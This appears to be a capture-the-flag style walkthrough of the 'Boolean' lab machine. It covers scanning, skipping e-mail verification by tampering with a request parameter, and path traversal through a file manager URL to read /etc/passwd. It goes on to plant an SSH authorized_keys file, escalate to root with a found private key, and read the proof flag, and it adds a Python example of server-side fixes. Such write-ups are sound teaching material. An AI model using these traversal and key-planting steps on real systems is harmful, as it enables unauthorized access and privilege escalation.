Key takeaways
- request/response parameter tampering
- filemanager path manipulation
- SSH key login / privilege escalation
Steps
First, run an nmap scan:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 03:26 UTC
Nmap scan report for 192.168.54.231
Host is up (0.00048s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
| 256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_ 256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp open http
| http-title: Boolean
|_Requested resource was http://192.168.54.231/login
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
| FourOhFourRequest, GetRequest, HTTPOptions:
| HTTP/1.0 403 Forbidden
| Content-Type: text/html; charset=UTF-8
|_ Content-Length: 0
3000/tcp closed ppp
33017/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Development
|_http-server-header: Apache/2.4.38 (Debian)
Both port 80 and port 33017 are worth a look, but port 80 is probably the more valuable one.
Before that, run a directory brute-force first: it turns up a filemanager, which suggests a path to RCE or LFI.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.175.231
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/quickhits.txt
[+] Negative Status codes: 503,502,404,429
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/filemanager (Status: 302) [Size: 94] [--> http://192.168.175.231/login]
/filemanager/ (Status: 302) [Size: 94] [--> http://192.168.175.231/login]
/login (Status: 200) [Size: 2413]
/login.php (Status: 200) [Size: 2413]
/register.php (Status: 200) [Size: 2765]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================
Open Burp Suite and register a user tim1 on the login page. The request and response look as follows: as long as confirmed=false, login never succeeds, but intercepting the response and changing the value to true does not work.
Since the response cannot be changed, try changing the parameters in the request instead: adding user%5Bconfirmed=true skips the e-mail verification step successfully.
At this point I originally planned to upload a PHP file to create a reverse shell, but it seems files can only be downloaded, not accessed, so another approach was needed. After downloading a few files, I found that the URL can be edited, http://192.168.108.231/?cwd=../../../../../etc&file=passwd&download=true, to get LFI, and this also revealed the remi user.
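The two bugs this walkthrough relies on are a mass-assignable user[confirmed] field and unchecked cwd/file parameters in the download handler. The following is an added Python example of how a server would close both (it is not code from the target application; BASE_DIR, the field names and the function names are assumptions):

```python
import os
from pathlib import Path
from typing import Optional

# Assumption: the file manager serves files below this root; the real app's root is unknown.
BASE_DIR = Path("/srv/filemanager/files")

# Registration fields a client may set. "confirmed" is deliberately absent: accepting
# user[confirmed]=true from the request body is what let the client skip e-mail verification.
ALLOWED_USER_FIELDS = {"username", "email", "password"}


def filter_user_params(params: dict) -> dict:
    """Keep only allowlisted registration fields; the server decides `confirmed` itself."""
    clean = {k: v for k, v in params.items() if k in ALLOWED_USER_FIELDS}
    clean["confirmed"] = False  # a new account always starts unconfirmed
    return clean


def resolve_download(cwd: str, file: str, base_dir: Path = BASE_DIR) -> Optional[Path]:
    """Map ?cwd=...&file=... to a path inside base_dir, or None if it would escape."""
    # The file part must be a bare name; directory navigation only happens through cwd.
    if not file or "/" in file or "\\" in file or file in (".", ".."):
        return None
    # normpath collapses '..' lexically, so the check also works when the traversal
    # target (e.g. /etc/passwd) does not exist on the host running this code.
    candidate = Path(os.path.normpath(base_dir / cwd.lstrip("/") / file))
    try:
        candidate.relative_to(base_dir)  # lexical containment check
    except ValueError:
        return None  # normalised path left base_dir: traversal attempt, log and refuse
    # In production also compare candidate.resolve() against base_dir.resolve()
    # so that a symlink inside the tree cannot point back out of it.
    return candidate
```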
Changing the path lets us walk through the files under /home/remi. The keys directory holds many keys, including root/id_rsa (even after downloading it, that key cannot be used to log in directly). We can, however, generate a key pair ourselves and upload an authorized_keys file under the .ssh path to get SSH login.
C:\home\kali\Documents\OFFSEC\GoToWork\Bool> ssh -i id_ed25519 remi@192.168.108.231
Linux boolean 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 20 22:35:11 2024 from 192.168.45.160
remi@boolean:~$
Remember the root file under .ssh/keys? It can be used for privilege escalation, but -o IdentityAgent=none has to be added, otherwise the login fails with "Too many authentication failures":
remi@boolean:~/.ssh/keys$ ssh -i root root@127.0.0.1
Received disconnect from 127.0.0.1 port 22:2: Too many authentication failures
Disconnected from 127.0.0.1 port 22
remi@boolean:~/.ssh/keys$ ssh -o IdentityAgent=none -i root root@127.0.0.1
Linux boolean 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 20 22:47:29 2024 from 127.0.0.1
root@boolean:~# cat /root/proof.txt
9179ea87c40a2ae93f0e1c65fc06065a
root@boolean:~#